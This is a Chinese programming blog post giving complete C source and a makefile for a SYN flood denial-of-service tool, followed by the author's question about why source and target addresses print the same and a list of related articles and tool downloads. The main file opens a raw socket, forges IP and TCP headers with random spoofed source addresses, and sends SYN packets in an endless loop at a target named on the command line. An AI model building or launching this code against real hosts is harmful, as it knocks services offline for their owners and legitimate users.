SYN_FLOOD攻击

最新推荐文章于 2024-05-21 22:54:53 发布
最新推荐文章于 2024-05-21 22:54:53 发布
阅读量454 收藏
点赞数
分类专栏: 网络 文章标签: tcp struct dst object byte random

ip.h----------------------------------------------------------------------------------------

#ifndef _IP_H__
#define _IP_H__

#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>

// ip 报头
struct ip
{
//小端法
#if BYTE_ORDER == LITTLE_ENDIAN
    unsigned char  ip_hl:4;               // ip 报头的长度
    unsigned char  ip_v:4;                // ip 的版本,IPv4...
#endif    

//大端法
#if BYTE_ORDER == BIG_ENDIAN
    unsigned char  ip_v:4;
    unsigned char  ip_hl:4;
#endif

    unsigned char  ip_tos;                //服务类型
    unsigned short ip_len;                // ip 数据报的全长
    unsigned short ip_id;                 
// 标识符:唯一标识该数据报的整数,一段数据可能被分为若干个分片,这些分片拥有 相同的 标识符

    unsigned short ip_off;                //分片偏移量:其占用了 13 个二进制位
#define IP_RF      0x8000                 // reserver fragment
#define IP_DF      0x4000                 // don't fragment:不要分片
#define IP_MF      0x2000                 // more fragment:还有分片
#define IP_OFFMASK 0x1fff                 // 掩码偏移量

    unsigned char  ip_ttl;                // 数据报存活时间:每经过一个路由器 数据报存活时间 递减,
//当被减到为 0时,丢弃。其值最大为 255,缺省值为 64,即默认值

    unsigned char  ip_p;                  // 协议:指定包含在 ip 数据报中的数据类型,
//其典型值为 1(ICMPv4),2(IGMPv4),6(TCP),17(UDP)...

    unsigned short ip_sum;                // ip 头部校验和:只对 IP 头部(包括任何选项)
//进行计算,其算法:16位反码加法

    struct in_addr ip_src;                //源地址
    struct in_addr ip_dst;                //目的地址                                    
};

unsigned short  checksum(unsigned short * packet,int packlen);
// ip 头部校验(头部,如果还有 选项 的话,加上)

#endif

ip.c-----------------------------------------------------------------------------------------
#include "ip.h"


/**************************
    checksum 函数:ip 数据报头部的校验和计算方法
    其参数:unsigned short *:packet:将要被计算的数据
           int             :packlen:该数据的长度
    返回值:unsigned short  :返回值可以将要被 赋值与 ip_sum
**************************/
unsigned short  checksum(unsigned short * packet,int packlen)
{
    unsigned long   sum = 0;
    
    while( packlen > 1)
    {
        sum     += *(packet++);
        packlen -= 2;            // 一个 short 类型有 16 个 bit,一个字节为 8 bit
    }

    if(packlen > 0)
    {//即 packlen == 1,即 packet 的长度为 奇数
        sum     += *(unsigned char *)packet;
//显示类型转换,因为只剩下一个字节,即一个 char,不足一个 short
    }

    while(sum >> 16)
    {//每次向 右 移动 16 位,一个 short
        sum = (sum & 0xffff) + (sum >> 16);
// 1)(sum & 0xffff):取 其 低16 位;2)(sum >> 16):向 右 移动 16 位
    }

    return (unsigned short)~sum;
}

tcp.h--------------------------------------------------------------------------------------
 #ifndef _TCP_H__
#define _TCP_H__


#include <string.h>
#include "ip.h"

#define MAXLEN     1024              //各种数据的长度

struct tcp
{
    unsigned short tcp_sport;        //源端口
    unsigned short tcp_dport;        //目的端口
    unsigned int   tcp_seq;          //数据报的顺序号
    unsigned int   tcp_ack_seq;      //确认号:表示发送方期望从接收方接收到的下一个顺序号

#if BYTE_ORDER == LITTLE_ENDIAN           
//小端法
    unsigned char  tcp_res1:4;       //保留位 4 个bit
    unsigned char  tcp_off:4;        //头部长度:表示 TCP 报头的长度
    unsigned char  tcp_fin:1;        // FIN:释放已建立的链接
    unsigned char  tcp_syn:1;        // SYN:用于链接同步,请求,确认链接的建立
    unsigned char  tcp_rst:1;        // RST:用于复位主机崩溃等原因导致的错误
                                       //拒绝非法的数据或链接请求
    unsigned char  tcp_psh:1;        // PSH:表示接收方应马上将数据上传到应用层
    unsigned char  tcp_ack:1;        // ACK:表示已经正确接收了确认序号之前的字节
    unsigned char  tcp_urg:1;        // URG:表示数据报的 “紧急指针”有效
    unsigned char  tcp_res2:2;       // 保留位 2 个bit
#endif

#if BYTE_ORDER == BIG_ENDIAN
//大端法
    unsigned char  tcp_off:4;
    unsigned char  tcp_res1:4;
    unsigned char  tcp_res2:2;
    unsigned char  tcp_urg:1;
    unsigned char  tcp_ack:1;
    unsigned char  tcp_psh:1;
    unsigned char  tcp_rst:1;
    unsigned char  tcp_syn:1;
    unsigned char  tcp_fin:1;
#endif

    unsigned short tcp_win;           //窗口大小:用于流量控制,通知对方 本地 能接收的字节数量
//取值为 0 通知对方暂定发送

    unsigned short tcp_sum;           //校验和:用来校验以便检查数据是否正确(TCP报头 + TCP数据报)
    unsigned short tcp_urp;           //紧急指针:表示当前顺序号到紧急数据的偏移量

};


// TCP 伪报头,用于 TCP 校验和
typedef struct
{
    struct in_addr saddr;             //源 IP 地址
    struct in_addr daddr;             //目的 IP 地址
    char           mbz;               // must be zero:用于填充,都置 0
    char           protocol;          // 8 位协议号
    unsigned short tcplen;            // TCP 包长度
}psdheader_t;

//TCP 校验和
unsigned short  tcp_checksum(struct ip *ip,struct tcp * tcp);

#endif

tcp.c--------------------------------------------------------------------------------------
#include "tcp.h"


/**************************
    tcp_checksum 函数:TCP 数据报的校验和计算方法
    其参数:struct ip *:ip:与该数据报相关联的 ip 首部
           struct tcp *:tcp:与该数据报相关联的 TCP 头部
    返回值:unsigned short  :返回值可以将要被 赋值与 ip_sum
**************************/
unsigned short  tcp_checksum(struct ip * iph,struct tcp * tcph)
{
    char              buf[1024] = {0};
    psdheader_t       *psdh = NULL;           // TCP 伪头部
   
//    memset(buf,0,sizeof(buf));                // buf  清 0
    bzero(buf,sizeof(buf));
   
    psdh = (psdheader_t *)buf;
    psdh->saddr    = iph->ip_src;
    psdh->daddr    = iph->ip_dst;
    psdh->mbz      = 0;
    psdh->protocol = IPPROTO_TCP;             // 或者 为 6
    psdh->tcplen   = htons(sizeof(struct tcp));

//把 TCP 数据复制到 buf 中,也可用 bzero 可能更好
    memcpy((buf+sizeof(psdheader_t)),tcph,sizeof(struct tcp));

    return checksum((unsigned short*)buf,sizeof(psdheader_t)+sizeof(struct tcp));
}


syn_flood.c-----------------------------------------------------------------------------
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include "tcp.h"

#define DPORT    9877         //目标端口
#define SPORT    8000         //源端口
#define MAXLEN   1024         //缓存区大小
#define MAXTTL   255          //IP 包的最大存活时间

int main(int argc,char *argv[])
{
    int          sockfd;          //套接口
    int          on     = 1;      //用于设置套接口属性,0 表示不起作用,1 表示起作用
    char         buf[MAXLEN];
    struct ip   *ip     = NULL;  
    struct tcp  *tcp    = NULL;
    ssize_t      headlen= sizeof(struct ip)+sizeof(struct tcp);

    struct sockaddr_in  toaddr;   
    struct hostent     *h;        //用以得到对应的 ip 地址
    unsigned short      check;    //用以 TCP 校验和

    if(argc < 2)
    {
        printf("usage: ./out <ip>");
        exit(1);
    }

    if((sockfd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) < 0)
    {
        perror("socket error");
        exit(1);
    }

    bzero(&toaddr,sizeof(toaddr));
    toaddr.sin_family   = AF_INET;
    toaddr.sin_port     = htons(DPORT);
   
    if(inet_aton(argv[1],&toaddr.sin_addr) == 1)
    {//argv[1]为 十进制的点地址

    }
    else if((h = gethostbyname(argv[1])) != NULL)
    {//argv[1] 为 www....
        bcopy(h->h_addr,&toaddr.sin_addr,h->h_length);
        printf("目的地址 :%s(%s)\n",argv[1],inet_ntoa(toaddr.sin_addr));
    }
    else
    {//输入错误
        printf("输入错误\n");
        exit(1);
    }

    if(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,(char*)&on,sizeof(on)) < 0)
    {//设置 套接口 的属性,on 为 1 表示起作用,on 为 0 表示不起作用
        perror("setsockopt error");
        exit(1);
    }
/*
设置 IP——HDRINCL 选项后,必须为所有发送到 此套接口 上的数据报构造 IP 头部,
一般情况下,内核会为发送到 原始套接口 上的数据报结构 构造 IP 头部
有时,有些应用程序也会 构造 IP 头部
*/

    //填充 IP 数据报头
    ip = (struct ip *)buf;
   
    ip->ip_v      = 4;             //其版本为 ipv4
    ip->ip_hl     = sizeof(struct ip) >> 2; // IP 数据报首部的长度(以 字 为单位)
    ip->ip_tos    = 0;             //服务类型
    ip->ip_len    = headlen;       //该 IP 数据报的全长
    ip->ip_id     = 0;             //由内核填写
    ip->ip_off    = 0;             //由内核填写
    ip->ip_ttl    = MAXTTL;        // IP 数据报的存活时间
    ip->ip_p      = IPPROTO_TCP;   //传输层协议为 TCP
    ip->ip_sum    = 0;             //由内核填写,且其初始值要为 0
    ip->ip_dst    = toaddr.sin_addr;//目的地址,即攻击目标

    //填充 TCP 数据报
    tcp = (struct tcp *)(buf + sizeof(struct ip));

    tcp->tcp_sport = htons(SPORT); //源端口
    tcp->tcp_dport = htons(DPORT); //目的端口
    tcp->tcp_seq   = htonl(random()); //随机长生序列号
    tcp->tcp_ack_seq = 0;              //确认号,攻击用,随便给
    tcp->tcp_off     = sizeof(struct tcp) >> 2; //TCP 首部
    tcp->tcp_syn     = 1;              // SYN 数据
    tcp->tcp_win     = htons(0x20);    //窗口大小

    check  = tcp_checksum(ip,tcp);
    tcp->tcp_sum     = check;          // TCP 校验和

    //循环发送攻击包
    while(1)
    {
        ip->ip_src.s_addr = random();  //随机生成源地址,使服务器接收不到 ACK 应答

        printf("source addr : %s\n,dest addr : %s\n",inet_ntoa(ip->ip_src),\
                inet_ntoa(ip->ip_dst));
   
        if(-1 == sendto(sockfd,buf,headlen,0,(struct sockaddr *)&toaddr,\
                        sizeof(struct sockaddr)))
        {
            perror("sendto error");
            exit(1);
        }
    }//end while(1)

    return 0;
}


makefile---------------------------------------------------------------------------------
CC   = gcc
FLAGS= -g -Wall

object = ip.o tcp.o syn_flood.o

C:$(object)
    $(CC) $(FLAGS) $(object) -o flood

ip.o:ip.h ip.c
    $(CC) $(FLAGS) -c ip.c
tcp.o:tcp.h tcp.c
    $(CC) $(FLAGS) -c tcp.c
syn_flood.o:syn_flood.c
    $(CC) $(FLAGS) -c syn_flood.c

.PHOINY:clean
clean:
    rm $(C) $(object)

-------------------------------------end------------------------------------------------------
问题:攻击时,怎么攻击目标和源地址总是一样的???
l-_-l
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
什么是SYN Flood
dexun2881281453的博客
08-18 2744
TCP连线的三次握手中,假设一个用户向伺服器传送了SYN报文后突然当机或掉线,那幺伺服器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成),这种情况下伺服器端一般会重试(再次传送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连线,这段时间的长度我们称为SYN Timeout,一般来说这个时间是分钟的数量级(大约为30秒-2分钟);SYN Flood攻击时,黑客发送的绝大多数是变源的SYN报文,所有的SYN报文对于Anti-DDoS系统来说都是首包,都将被直接丢弃。.
SYN Flood 是什么?
Ecloud的博客
10-21 2212
SYN Flood 又称 SYN 洪水攻击,也是拒绝服务攻击的一种,是一种曾经很经典的攻击方式。攻击者利用TCP协议的安全缺陷,不断发送一系列的SYN请求到目标系统,消耗服务器系统的资源,从而导致目标服务器不响应合法流量请求。 一次正常的网络请求流程 在谈SYN flood 之前,我们先了解一下一次正常的网络请求都有哪些步骤,从而更清晰的了解SYN Flood攻击方式。 一般一次正常的网络请求分以下几个步骤: 域名解析 TCP握手建立链接 客户端发起请求 服务器响应请求 客户端解析并且..
Syn-Flood攻击
hl1293348082的专栏
04-06 9539
Syn-Flood Attack是一种基于TCP/IP协议的拒绝服务攻击,它会造成服务器TCP连接数达到最大上限,从而不能为新的用户的正常访问请求建立TCP连接,以此达到攻击目的。这种攻击方式危害巨大,不仅会让用户体验不佳,更直接的影响是对企业造成严重的经济损失!所以我们有必要了解这种攻击的原理和防御措施。 0x01. TCP/IP三次握手 1.第一次握手:Client将标志位(也就是flags位)SYN置为1,随机产生一个值seq=J,并将该数据包发送给Server,Client进入SYN_SEN
SYN Flood是什么?这篇给你讲明白!
最新发布
a38417的博客
05-21 755
手,还体现在超时与重传的机制。它利用了TCP协议的三次握手机制,攻击者通常利用工具或者控制僵尸主机向服务器发送海量的变源IP地址或变源端口的TCP SYN报文,服务器响应了这些报文后就会生成大量的半连接,当系统资源被耗尽后,服务器将无法提供正常的服务。这种行为的关键结果是,必须将新的(或未使用的)内存专用于复制的TCB,而不是更新已分配的内存。此时就需要Anti-DDoS系统的能力了,它部署在网络入口处,在服务器之前处理SYN报文,识别出虚假源,屏蔽来自这些地址的报文,只将合法的SYN报文传递给服务器。
SYN-Flood攻击与防御
qq_52269550的博客
05-26 3659
文章目录前言一、怎么进行攻击二、怎么防御SYN-Flood攻击 前言 SYN-Flood是一种利用TCP协议缺陷,发送大量伪造的TCP连接请求。(首先需要了解TCP三次握手,我其他博客有详细解释,这里就不在赘述了) 一、怎么进行攻击攻击者向服务器发送大量的SYN报文后,而不进行TCP第三次握手ACK包的应答。那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的,这种情况下服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源无暇理睬客户的正常请求,此时从正常客户的角度去看,服务器失
DDOS渗透与攻防(二)之SYN-Flood攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
01-28 1908
SYN Flood (SYN洪水) 是种典型的DoS (Denial of Service,拒绝服务) 攻击。效果就是服务器TCP连接资源耗尽,停止响应正常的TCP连接请求。说到原理,还得从TCP如何建立连接(Connection)讲起。通信的双方最少得经过3次成功的信息交换才能进入连接全开状态(Full-Open),行话叫建立TCP连接的3次握手(TCP three-way handshake)。假设连接发起方是A,连接接受方是B,即B在某个端口(Port)上监听A发出的连接请求。
syn_flood.c
06-14
syn_flood洪水攻击的代码,如有需要,可以下载,谢谢大家。
SYNFlood.zip_ Synflood_SYNflood_YSNFlood_attack_synflood攻击MFC
07-14
SYNFLOOD 攻击源代码 C++ 实现拒绝服务攻击 可以不断发送SYN
SYN_FLOOD网站工具包
07-27
分享 SYN_FLOOD_和谐网站工具包
SYN_Flood-master.zip
06-03
可以直接使用 SYN攻击属于DOS攻击的一种,它利用TCP协议缺陷,通过发送大量的半连接请求,耗费CPU和内存资源。 ##使用 $ gcc -o syn syn_flood.c -lpthread $ sudo ./syn <IPaddress> <port>
buha_sources_id_2_dlfile.rar_SYNflood_syn flood
09-22
标题中的"buha_sources_id_2_dlfile.rar_SYNflood_syn flood"暗示了这是一个关于SYN Flood攻击的源代码文件,其中"SYNFlood"和"syn_flood"是网络攻防领域中著名的DDoS(分布式拒绝服务)攻击类型。SYN Flood攻击是一...
syn flood测试工具
03-11
学习网路基础tcp/ip,可以用来模拟黑客攻击仅供测试使用。
DDoS攻击--Syn_Flood攻击防护详解(TCP)
Linux
04-22 974
Syn_Flood概述 Syn-Flood攻击是当前网络上最为常见的DDoS攻击,也是最为经典的拒绝服务攻击,它利用了TCP协议实现上的一个缺陷,通过向网络服务所在端口发送大量的伪造源地址的攻击报文,就可能造成目标服务器中的半开连接队列被占满,从而阻止其他合法用户进行访问。 这种攻击早在1996年就被发现,但...
SYN Flood的发起、现象、防御方式介绍
weixin_55843145的博客
07-20 1030
本篇通过实验介绍如何从KALI系统发起SYN Flood攻击,靶机现象,以及加装防火墙之后的现象,一起学习和理解SYN Flood攻击
SYN Flood 工具源码
starshift的专栏
09-06 1658
#include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include u_int16_t  srcport; struct pseudohdr
自己写syn flood程序
dangdanding的专栏
08-14 2068
/* *      Function: SYN flood generator * *      File Name: synf.c *  *      Copyright by: free redistribution * *      Created by: dangdanding@163.com * *      //create RAW socket *      //When use S
hping3的使用
angleoldhen的专栏
08-08 6469
hping3的参数与使用
syn_flood 攻击实验结论
06-03
syn_flood攻击实验中,通过发送大量的伪造的TCP SYN连接请求,可以占用服务器的大量资源,导致服务器无法正常处理正常的连接请求。实验结果表明,syn_flood攻击可以导致服务器的带宽异常增高,连接队列溢出,CPU...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值